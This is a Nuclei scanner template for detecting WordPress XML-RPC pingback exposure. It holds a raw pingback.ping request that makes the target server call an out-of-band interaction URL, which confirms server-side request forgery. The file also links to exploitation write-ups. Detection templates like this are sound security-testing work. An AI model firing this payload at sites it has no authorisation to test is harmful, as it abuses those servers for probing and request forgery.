id: wp-xmlrpc-pingback-detection

info:
  name: Wordpress XMLRPC - Pingback Detection
  author: pdteam
  severity: info
  description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks.
  reference:
    - https://github.com/dorkerdevil/rpckiller
    - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
  metadata:
    max-request: 2
  tags: wordpress,ssrf,oast,xmlrpc

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: humans_21909=1

    matchers:
      - type: word
        words:
          - 'XML-RPC server accepts POST requests only.'
        internal: true

  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}

        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value>
                <string>http://{{interactsh-url}}</string>
              </value>
            </param>
            <param>
              <value>
                <string>{{BaseURL}}/?p=1</string>
              </value>
            </param>
          </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or
# digest: 490a004630440220529d9302db92bcc0ed4722bd3ba34d1f04b99c8267802f46bf6e7f0ea552a41f02205c467d99a475f65cbdeeb7a9c5d2e29e2c39b3509a5756a63291f573b3e82145:922c64590222798bb761d5b6d8e72950